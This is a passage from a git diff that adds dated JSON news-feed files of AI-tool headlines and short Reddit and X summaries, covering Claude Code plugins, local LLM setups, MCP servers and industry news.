deep experience in \\[tech stack / domain\\].\n\nYour job is to build this project end-to-end — from architecture to final output — with zero hand-holding needed.\n\n PROJECT\n\nName: \\[Project name\\]\n\nType: \\[Web app / CLI tool / API / Dashboard / Bot / etc.\\]\n\nOne-liner: \\[What it does in one sentence\\]\n\nTarget user: \\[Who will use this\\]\n\nGOAL\n\nBuild a complete, working, production-ready \\[project type\\] that", + "category": "ai_tools" + }, + { + "title": "Reddit is broken! I proved it with Claude", + "url": "https://reddit.com/r/ClaudeAI/comments/1sfk205/reddit_is_broken_i_proved_it_with_claude/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.78, + "date": "2026-04-08T05:34:03.000Z", + "summary": "Built this for a hackathon. It's a Chrome extension that rescores every comment in a Reddit or HN thread using actual relevance instead of karma.\n\n**How I built it with Claude:**\n\nI used Claude (Sonnet via API) for pretty much the entire thing, generating the Chrome extension scaffold, writing the content extraction logic that pulls comments from Reddit's DOM, and building the ranking pipeline that sends comments to ZeroEntropy's zerank-2 model for instruction-reranking. Claude also helped me wr", + "category": "ai_tools" + }, + { + "title": "I built an MCP that gives Claude Code its own servers to fix bugs in parallel", + "url": "https://reddit.com/r/ClaudeAI/comments/1sg5j6w/i_built_an_mcp_that_gives_claude_code_its_own/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 0.7, + "date": "2026-04-08T21:05:27.000Z", + "summary": "I am increasingly using Claude Code, as much as and my laptop couldn't keep up. That macOS \"force quit\" window popped up so much I kept that window permanently open to resume activities... I had multiple projects and wanted to fix a dozen of bugs at the same time, generate other long features. Many agents on one machine doesn't work well, they eat resources and trip over each other.\n\nSo I built Gibil, a CLI that gives each task its own throwaway Linux. Real VM on Hetzner, about a minute, \\~$0.03", + "category": "ai_tools" + }, + { + "title": "Turbo-OCR for high-volume image and PDF processing", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sg8lfr/turboocr_for_highvolume_image_and_pdf_processing/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-08T23:08:06.000Z", + "summary": "I recently had to process \\~940,000 PDFs. I started with the standard OCR tools, but the bottlenecking was frustrating. Even on an RTX 5090, I was seeing low speed.\n\nThe Problem:\n\n* PaddleOCR (the most popular open source OCR): Maxed out at \\~15 img/s. GPU utilization hovered around 15%. Their high performance inference mode doesn't support Blackwell GPUs yet (needs CUDA < 12.8) and doesn't work with the latin recognition model either.\n* VLM OCR (via vLLM): Great accuracy, but crawled at 2 im", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-09.json b/data/news-feed-2026-04-09.json new file mode 100644 index 0000000..9edbb2b --- /dev/null +++ b/data/news-feed-2026-04-09.json @@ -0,0 +1,253 @@ +{ + "generated": "2026-06-05T00:44:33.363Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-09", + "article_count": 15, + "archived_story_count": 616, + "articles": [ + { + "title": "Hermes Agent Is Displacing OpenClaw — And Nobody Is Talking About It", + "url": "https://x.com/ghumare64/status/2042234817358462986", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source", + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-09T14:33:10.226Z", + "summary": "Hermes Agent is quietly displacing OpenClaw as the dominant open-source AI agent framework, with a new memory plugin and viral tutorials driving adoption. The architectural difference is fundamental.", + "category": "ai_tools" + }, + { + "title": "OpenWork, an opensource Claude Cowork alternative, is silently relicensing under a commercial license", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sgnppg/openwork_an_opensource_claude_cowork_alternative/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-09T12:05:50.000Z", + "summary": "OpenWork is a locally hosted AI agent harness that was presented as a MIT-licensed opensource Claude Cowork alternative based on opencode.\n\nJust a heads up for any user of the app that it has silently relicensed some components under a commercial license and modified the overall project's MIT license to limit its reach (which I am not even sure makes it a MIT license anymore).\n\nMore details here: https://github.com/different-ai/openwork/issues/1412\n\nNote that as a fellow opensource developer mys", + "category": "ai_models" + }, + { + "title": "OpenWork, an opensource Claude Code alternative, is silently relicensing under a commercial license", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sgm9d1/openwork_an_opensource_claude_code_alternative_is/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-09T10:54:02.000Z", + "summary": "OpenWork is locally hosted AI agent harness that was presented as a MIT-licensed opensource Claude Cowork alternative based on opencode.\n\nJust a heads up for any user of the app that it has silently relicensed some components under a commercial license and modified the overall project's MIT license to limit its reach (which I am not even sure makes it a MIT license anymore).\n\nMore details here: https://github.com/different-ai/openwork/issues/1412\n\nNote that as a fellow opensource developer mysel", + "category": "ai_models" + }, + { + "title": "I built a multi-agent coordination plugin for Claude Code using Royal Navy procedures. 237 stars later I'm still not sure if the metaphor is genius or unhinged.", + "url": "https://reddit.com/r/ClaudeAI/comments/1sgx5i0/i_built_a_multiagent_coordination_plugin_for/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "developer_tool", + "tool_update" + ], + "importance": 0.8600000000000001, + "date": "2026-04-09T17:59:55.000Z", + "summary": "So earlier this year Anthropic shipped the experimental Agent Teams feature. I'd spent the Christmas break reading about the Gas Town vision and was properly excited to try it. Agent Teams felt like Claude Code's version of a mini Gas Town.\n\nThen I actually used it. Agent one rewrote a module. Agent two rewrote that module's tests. Agent three updated the integration layer that depended on both. Nobody told agent three about the interface changes from agents one and two.\n\nThree pieces of perfect", + "category": "ai_tools" + }, + { + "title": "Managed Agents launched today. I built a Slack relay, tested it end-to-end. Here's what I found.", + "url": "https://reddit.com/r/ClaudeAI/comments/1sgejap/managed_agents_launched_today_i_built_a_slack/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 0.78, + "date": "2026-04-09T03:36:27.000Z", + "summary": "Managed Agents dropped a few hours ago. I had been reading the docs ahead of time, so I built a full Slack relay right away - Socket Mode listener, session-per-channel management, SSE streaming, cost tracking via span events. Tested multi-turn conversations, tool usage, session persistence. Wanted to share what I found. \n\nThe prompt caching is genuinely impressive. My second session cost $0.006 because the system prompt and tool definitions were served from cache automatically. API design is cle", + "category": "ai_tools" + }, + { + "title": "I built a security scanner for Claude Code (and vibe coding in general) — here's what it found in my own projects", + "url": "https://reddit.com/r/ClaudeAI/comments/1sgboiu/i_built_a_security_scanner_for_claude_code_and/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 0.78, + "date": "2026-04-09T01:24:01.000Z", + "summary": "I built VibeLint using Claude Code. It runs as an MCP server inside your IDE and scans AI-generated code for security issues before it gets written to your files.\n\nWhile building it, I started scanning my own projects with it. What I found was uncomfortable.\n\nIn one file, it caught my OpenAI API key and my Supabase service role key — both hardcoded by the AI. The service role key bypasses RLS entirely, meaning anyone with it has unrestricted access to the database.\n\nAcross my last 5 projects, th", + "category": "ai_tools" + }, + { + "title": "your claude doesn't need a better memory, it needs a self-evolving knowledge base", + "url": "https://reddit.com/r/ClaudeAI/comments/1sgr5zz/your_claude_doesnt_need_a_better_memory_it_needs/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "developer_tool" + ], + "matching_tags": [ + "mcp", + "developer_tool" + ], + "importance": 0.7, + "date": "2026-04-09T14:27:00.000Z", + "summary": "https://i.redd.it/57wdspbqc6ug1.gif\n\nAndrej Karpathy recently shared his setup for building a personal LLM knowledge base - raw docs, LLM compiles them into a structured wiki, then queries the wiki for answers.\n\nI've been building something similar for the past year, except it's not a set of scripts - it's a plugin you can install in 2 minutes.\n\nThe idea: every conversation you have in claude (Desktop, claude code or any MCP-compatible tool like codex, cursor) gets compacted into a memory episod", + "category": "ai_tools" + }, + { + "title": "Chinese AI models (Qwen, Kimi, MiniMax) are going closed-source. Does that kill their appeal for you?", + "url": "https://reddit.com/r/ChatGPT/comments/1sgfp00/chinese_ai_models_qwen_kimi_minimax_are_going/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 0.62, + "date": "2026-04-09T04:34:27.000Z", + "summary": "Honest question for people who actually use these models:\n\nThe main reason I and many others trusted Chinese AI models was open source — you could run them locally, inspect the weights, avoid sending data to Chinese servers. That felt like a reasonable workaround for anyone with privacy or geopolitical concerns.\n\nNow that they're closing up, the calculus changes:\n\n\\- No local deployment\n\n\\- API calls go to servers in China\n\n\\- No way to verify what the model is actually doing\n\nIs this a dealbrea", + "category": "ai_tools" + }, + { + "title": "Dynamic few-shot retrieval on Apple's on-device 3B LLM: 40% → 70%+ on shell commands", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sgxo6d/dynamic_fewshot_retrieval_on_apples_ondevice_3b/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-04-09T18:17:58.000Z", + "summary": "I've been poking at Apple's on-device 3B model (via FoundationModels on Tahoe) to see where its ceiling sits on code-adjacent tasks. Tested shell command generation as a concrete benchmark (100 prompts, \\~10 approaches)\n\nhttps://i.redd.it/ferxmyorh7ug1.gif\n\nBare model: \\~40% correct. Mostly flags and some command hallucinations. Feeding documentation as context didn't help. Not man pages, not tldr as docs, not self-critique loops. All within noise of baseline, and self-critique was actively wors", + "category": "ai_models" + }, + { + "title": "OpenAI pauses UK data centre deal over energy costs and regulationThe project was part of a package of tech investment promising the UK could become an AI superpower.See more", + "url": "https://www.bbc.com/news/articles/clyd032ej70o", + "source": "BBC AI", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-04-09T18:00:10.184Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "I benchmarked 42 STT models on medical audio with a new Medical WER metric — the leaderboard completely reshuffled", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sgtrgc/i_benchmarked_42_stt_models_on_medical_audio_with/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-09T16:00:16.000Z", + "summary": "**TL;DR:** I updated my medical speech-to-text benchmark to **42 models** (up from 31 in v3) and added a new metric: **Medical WER (M-WER)**.\n\nStandard WER treats every word equally. In medical audio, that makes little sense — **“yeah” and “amoxicillin” do not carry the same importance**.\n\nSo for v4 I re-scored the benchmark using only **clinically relevant words**: drugs, conditions, symptoms, anatomy, and clinical procedures. I also broke out **Drug M-WER** separately, since medication names a", + "category": "ai_models" + }, + { + "title": "LG Just Released the First Open-Weight Vision Language Model for Physical Intelligence", + "url": "https://x.com/LG_AI_Research", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-09T14:33:10.226Z", + "summary": "LG AI Research launched EXAONE 4.5, their first open-weight Vision Language Model targeting physical intelligence and robotics. LG's hardware and manufacturing expertise gives them unique insight into what robots need.", + "category": "ai_tools" + }, + { + "title": "Open-Source Models Can Do Everything Claude Mythos Can Do", + "url": "https://x.com/stanislavfort", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-09T14:33:10.226Z", + "summary": "Researchers replicated all 8 Mythos security vulnerabilities using open-source models, proving dangerous AI capabilities cannot be contained by restricting frontier model access. The finding has major implications for AI safety policy.", + "category": "ai_tools" + }, + { + "title": "NanoBanana Powers WorldAgents — AI Image Generator Used for 3D World Creation", + "url": "https://x.com/MattNiessner/status/2036019740930408905", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-09T14:29:35.589Z", + "summary": "NanoBanana is being used as the Generator in WorldAgents for 3D world creation, demonstrating how AI image models are being integrated into complex multi-agent creative systems. The integration highlights NanoBanana's versatility.", + "category": "ai_tools" + }, + { + "title": "Unused phone as AI server", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sgqlfn/unused_phone_as_ai_server/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-09T14:05:51.000Z", + "summary": "If you have an unused phone lying around, you might be sitting on a tiny AI server\n\nI’ve been working on a project where I modified Google AI Edge Gallery and turned it into an OpenAI-compatible API server: \\[Gallery as Server\\](https://github.com/xiaoyao9184/gallery)\n\nYour phone can run local AI inference\n\nYou can call it just like an OpenAI API (chat/completions, etc.)\n\nInstead of letting that hardware collect dust, you can turn it into a lightweight inference node.\n\nSo yeah—if you have more t", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-10.json b/data/news-feed-2026-04-10.json new file mode 100644 index 0000000..391cf9f --- /dev/null +++ b/data/news-feed-2026-04-10.json @@ -0,0 +1,245 @@ +{ + "generated": "2026-06-05T00:44:33.549Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-10", + "article_count": 15, + "archived_story_count": 178, + "articles": [ + { + "title": "Anthropic just shipped 74 product releases in 52 days and silently turned Claude into something that isn't a chatbot anymore", + "url": "https://reddit.com/r/ClaudeAI/comments/1she8ux/anthropic_just_shipped_74_product_releases_in_52/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "product_launch", + "developer_tool", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "developer_tool", + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-10T06:08:44.000Z", + "summary": "Anthropic just made Claude Cowork generally available on all paid plans, added enterprise controls, role based access, spend limits, OpenTelemetry observability and a Zoom connector, plus they launched Managed Agents which is basically composable APIs for deploying cloud hosted agents at scale.\n\nin the last 52 days they shipped 74 product releases, Cowork in January, plugin marketplace in February, memory free for all users in March, Windows computer use in April, Microsoft 365 integration on ev", + "category": "ai_tools" + }, + { + "title": "@ArtificialAnlys HappyHorse-1.0 — New #1 Video Model for Creative Professionals, API April 30", + "url": "https://x.com/ArtificialAnlys/status/2042457674441482736", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-04-10T05:16:11.374Z", + "summary": "HappyHorse-1.0 from Alibaba has topped the video generation leaderboard and is particularly strong at multi-shot cinematic generation and following detailed creative directions. API releases April 30 at half the cost of Seedance.", + "category": "ai_tools" + }, + { + "title": "Combined Karpathy's LLM Wiki with Milla Jovovich`s MemPalace MCP. Claude Code now remembers everything across sessions", + "url": "https://reddit.com/r/ClaudeAI/comments/1sh48b4/combined_karpathys_llm_wiki_with_milla_jovovichs/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 0.78, + "date": "2026-04-09T22:19:44.000Z", + "summary": "If you use Claude Code for anything serious, you know the pain. Every new session = blank slate. Your CLAUDE.md helps, but it's static. The real context - decisions you made, ideas you explored, connections you discovered - all gone.\n\nI built a system that fixes this. It's called Memoriki - a template that combines two open source projects:\n\n**Layer 1: LLM Wiki (Karpathy's pattern)**\n\nYou drop raw sources into a folder (articles, transcripts, notes, whatever). Claude Code reads them and builds w", + "category": "ai_tools" + }, + { + "title": "I no longer need a cloud LLM to do quick web research", + "url": "https://reddit.com/r/LocalLLaMA/comments/1shezi8/i_no_longer_need_a_cloud_llm_to_do_quick_web/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 1, + "date": "2026-04-10T06:51:35.000Z", + "summary": "This might be super old news to some people, but I only just recently started using local models due to them only just now meeting my standards for quality. I just want to share the setup I have for web searching/scraping locally.\n\nI use Qwen3.5:27B-Q3\\_K\\_M on an RTX 4090 with a context length of \\~200,000. I get \\~40 tk/s and use about 22gb VRAM.\n\nI use it through the llama.cpp Web UI, with MCP tools enabled. Here are the tools I have provided it for web search/scrape:\n\n \"\"\"\n webmcp - MC", + "category": "ai_models" + }, + { + "title": "Florida AG announces investigation into OpenAI over shooting that allegedly involved ChatGPT", + "url": "https://techcrunch.com/2026/04/09/florida-ag-investigation-openai-chatgpt-shooting/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-10T06:00:22.605Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "AI DevCon 2026 — June 1-2, London and Virtual — Agentic Coding at Production Scale", + "url": "https://x.com/ainativedev/status/2031797311790260394", + "source": "Aligned News (Scoble)", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-10T05:16:13.355Z", + "summary": "AI DevCon 2026 will be held June 1-2 in London with a virtual option, focused on developers building real AI native systems including agents, specs, workflows, and platforms at production scale.", + "category": "ai_tools" + }, + { + "title": "@hugobowne AI Observability Engineer — The Most In-Demand Role Nobody Is Hiring For", + "url": "https://x.com/hugobowne/status/2042464629214101663", + "source": "Aligned News (Scoble)", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-10T05:16:12.382Z", + "summary": "Analysis of 1,400+ real AI agent deployments reveals that AI observability is the critical gap in most enterprise AI deployments. The skills to build monitoring and evaluation infrastructure for AI agents are in high demand.", + "category": "ai_tools" + }, + { + "title": "@InfluxDB InfluxDB CTO on Changelog — What Changed About Coding with AI", + "url": "https://x.com/InfluxDB/status/2042388369674469612", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-10T05:16:10.444Z", + "summary": "InfluxDB cofounder and CTO Paul Dix appeared on the Changelog podcast to discuss what fundamentally changed about his approach to coding with AI and what it means to build the machine that builds the machine.", + "category": "ai_tools" + }, + { + "title": "@Techmeme Alibaba's Pivot from Open Source to MaaS — A Signal for Global AI Policy", + "url": "https://x.com/Techmeme/status/2042465278462955882", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-10T05:16:08.371Z", + "summary": "Alibaba's strategic pivot from open source AI to monetizable Model-as-a-Service models, accompanied by leadership changes, signals a broader shift in how major AI companies are thinking about commercialization and governance.", + "category": "ai_tools" + }, + { + "title": "@Berci China's AI Hospital Definition — A Policy Framework for AI in Healthcare", + "url": "https://x.com/Berci/status/2042464294432858357", + "source": "Aligned News (Scoble)", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-04-10T05:16:08.371Z", + "summary": "China's official definition of AI Hospitals represents a policy framework for integrating AI into healthcare at the system level. The definition has implications for healthcare governance, accountability, and patient rights globally.", + "category": "ai_tools" + }, + { + "title": "96GB Vram. What to run in 2026?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1shd5nm/96gb_vram_what_to_run_in_2026/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-10T05:07:43.000Z", + "summary": "I was all set on doing the 4x 3090 route but with the current releases of qwen 3.5 and gemma 4. I am having second doubts. 96gb of vram seems to be in a weird spot where it not enough to run larger models and more than needed for the mid models. What are you running as your main model? ", + "category": "ai_models" + }, + { + "title": "making my own ai waifu app that can teach me any language.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1shbb6b/making_my_own_ai_waifu_app_that_can_teach_me_any/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-10T03:32:15.000Z", + "summary": "using gemma-4-E4B-it for the llm \nher voice is using omnivoice tts that i made the api using fastapi\n\n3d model made by me using vroid studio \nright now is support uploading image, search web, and using voice call and video call like grok ani.\n\ni'm surprised by gemma 4 model that can follow my prompt well without uncensoring the model.", + "category": "ai_models" + }, + { + "title": "Can a small (2B) local LLM become good at coding by copying + editing GitHub code instead of generating from scratch?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1shazjo/can_a_small_2b_local_llm_become_good_at_coding_by/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-10T03:16:52.000Z", + "summary": "I’ve been thinking about a lightweight coding AI agent that can run locally on low end GPUs (like RTX 2050), and I wanted to get feedback on whether this approach makes sense.\n\n# The core Idea is :\n\nInstead of relying on a small model (\\~2B params) to generate code from scratch (which is usually weak), the agent would\n\n1. search GitHub for relevant code\n\n2. use that as a reference\n\n3. copy + adapt existing implementations\n\n4. generate minimal edits instead of full solutions\n\nSo the model acts mo", + "category": "ai_models" + }, + { + "title": "is Agentic Commerce just the next buzzword for let’s automate your bank account?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sha12i/is_agentic_commerce_just_the_next_buzzword_for/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-10T02:32:35.000Z", + "summary": "Just saw this TechNode article claiming \"AI agents\" will be spending $1.5 trillion by 2030. Honestly? I’m calling BS on the timeline.\n\nWe can’t even get Siri to set a timer correctly half the time, and now they want us to believe we’ll have \"agents\" out there negotiating prices and buying stuff for us? The tech is one thing, but the incentive structure is a nightmare.\n\nThink about it: Why would a brand let your AI agent find the absolute cheapest price? They’ll just find a way to pay the AI comp", + "category": "ai_models" + }, + { + "title": "Started a video series on building an orchestration layer for LLM post-training [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1sh76ji/started_a_video_series_on_building_an/", + "source": "Reddit r/MachineLearning", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-04-10T00:24:33.000Z", + "summary": "Hi everyone!\n\nContext, motivation, a lot of yapping, feel free to skip to TL;DR.\n\nA while back I posted here asking [\\[D\\] What framework do you use for RL post-training at scale?](https://www.reddit.com/r/MachineLearning/comments/1qrer61/d_what_framework_do_you_use_for_rl_posttraining/). Since then I've been working with [verl](https://github.com/verl-project/verl.git), both professionally and on my own time. \n\nAt first I wasn't trying to build anything new. I mostly wanted to understand veRL p", + "category": "ai_research" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-11.json b/data/news-feed-2026-04-11.json new file mode 100644 index 0000000..371c3b4 --- /dev/null +++ b/data/news-feed-2026-04-11.json @@ -0,0 +1,249 @@ +{ + "generated": "2026-06-05T00:44:33.705Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-11", + "article_count": 15, + "archived_story_count": 346, + "articles": [ + { + "title": "How I made my Claude multimodal — now I just feed it videos", + "url": "https://reddit.com/r/ClaudeAI/comments/1simmfx/how_i_made_my_claude_multimodal_now_i_just_feed/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-11T15:49:48.000Z", + "summary": "Claude + Qwen API\n\nFigured out (with Claude's help) how to set up a bridge to Qwen 3.5 Omni Plus API so that Claude calls it on its own — sends the video with a prompt, iterates on the result, and comes back with a report or action.\n\nNow I just drop a video straight into Claude and get back what I need.\n\nPackaged it as a plugin for easy setup.\n\ngithub.com/kirillbrsnkv/give-claude-eyes", + "category": "ai_tools" + }, + { + "title": "How to get Claude to run more autonomously", + "url": "https://reddit.com/r/ClaudeAI/comments/1sigr1t/how_to_get_claude_to_run_more_autonomously/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 1, + "date": "2026-04-11T11:38:26.000Z", + "summary": "Hi! Can someone tell me how to get Claude to work more autonomously on a large task?\n\nA bit of context: \nI have a .NET project, it contains unit test coverage, integration tests and API tests. Recently we decided to become more strict on code style and warnings.\n\nThe application has large request and response models for an external API. Currently, that model is camelCase not PascalCase. Also a lot of properties are nullable, but not explicitly. 3k warnings currently.\n\nSuper tedious for a human ", + "category": "ai_tools" + }, + { + "title": "update on my ai waifu app, can use web search react to images even picture of herself", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sige8s/update_on_my_ai_waifu_app_can_use_web_search/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-04-11T11:19:52.000Z", + "summary": "using qwen 3 VL for the llm and the vision (really good for recognize popular characters and even recognize their appearances)\n\nusing SerpApi for the web search\n\nthe tts is using omnivoice tts (support 600+ languages) that i make a custom api that i recently open source it, get it here: [https://github.com/aziib/omnivoice-tts-api](https://github.com/aziib/omnivoice-tts-api)\n\nmy ai waifu project stil in work in progress, i just hope there is free web search api, SerpApi has some search limit usag", + "category": "ai_models" + }, + { + "title": "I built an open-source platform to manage multiple coding agents – recursive split panes, shared content folder, and a per-project wiki", + "url": "https://reddit.com/r/ClaudeAI/comments/1sidojq/i_built_an_opensource_platform_to_manage_multiple/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-11T08:42:01.000Z", + "summary": "If you run multiple agent CLIs daily, you've probably hit the same pain points I have:\n\n1. Too many terminal windows — impossible to find the one you need\n2. Tmux commands are clunky — switching sessions is awkward, easy to jump to the wrong window, and you can't even scroll with your mouse\n3. Sharing files between agents means manually copying everything into the project folder\n\nI looked around at open-source agent management platforms and couldn't find one that fit my workflow. So I took the b", + "category": "ai_tools" + }, + { + "title": "I automated most of my job", + "url": "https://reddit.com/r/ClaudeAI/comments/1shngqm/i_automated_most_of_my_job/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-10T14:03:08.000Z", + "summary": "I'm a software engineer with 11 yoe. I automated about 80% of my job with claude cli and a super simple dotnet console app.\n\nThe workflow is super simple:\n\n1. dotnet app calls our gitlab api for issues assigned to me\n\n2. if an issue is found it gets classified → simple prompt that starts claude code with the repo and all image attachments incl. the issue description\n\n3. if the result is that the issue is not ready for development, an answer is posted to my gitlab (i currently just save a draft a", + "category": "ai_tools" + }, + { + "title": "I got tired of juggling 4 Claude Code sessions, so I built a workspace manager for it", + "url": "https://reddit.com/r/ClaudeAI/comments/1sidlpe/i_got_tired_of_juggling_4_claude_code_sessions_so/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.99, + "date": "2026-04-11T08:37:14.000Z", + "summary": "Last month I caught myself running Claude Code in 4 separate terminal windows — one for the API refactor, one for tests, one for the frontend, one as a scratch session. Alt-tab hell. I'd lose track of which session was waiting for me to approve a tool call, which one was still thinking, and which had silently errored out 10 minutes ago.\n\nSo I built **Flowyble Studio** — a desktop app that runs multiple Claude Code sessions side-by-side in split panels, one workspace per project.\n\nWhat it does fo", + "category": "ai_tools" + }, + { + "title": "I built a notification tool for Claude Code, hit 374 downloads, then found out notifications were broken the whole time — v1.1.0 is out", + "url": "https://reddit.com/r/ClaudeAI/comments/1siexm7/i_built_a_notification_tool_for_claude_code_hit/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 0.96, + "date": "2026-04-11T09:58:19.000Z", + "summary": " \nBuilt with Claude Code, specifically for Claude Code users. Free, open source, MIT. \n \nWhat it does \n \nu/daik0z/claude-notify adds a Stop hook to \\~/.claude/settings.json. When Claude Code finishes a task, you get a push notification — desktop, mobile via ntfy, or any webhook. The body summarizes what happened: \"3 files edited · 2 commands \n\". \n \nnpm install -g u/daik0z/claude-notify \nclaude-notify setup \n \nWhat I learned from 374 downloads \n \nI sat down to stress-test it and foun", + "category": "ai_tools" + }, + { + "title": "ComfyUI workflow to fully python script?", + "url": "https://reddit.com/r/StableDiffusion/comments/1siy8ty/comfyui_workflow_to_fully_python_script/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-11T23:25:36.000Z", + "summary": "Hey, I have a ComfyUI workflow and I want to rewrite it as a plain Python script. No ComfyUI API, no wrappers, just native Python.\n\nWhy?\nI'm planning to use a multi-GPU server and I want to optimize for that.\n\nWhat libraries should I use? Is Diffusers the go-to or is there something better? Any tips from people who've done this?\n\nAlso, custom nodes are tricky. does anyone know a good method or step-by-step instructions for handling those?\n\nThank you!", + "category": "creative_tools" + }, + { + "title": "Labs for Claude Certified Architect Foundations Exam", + "url": 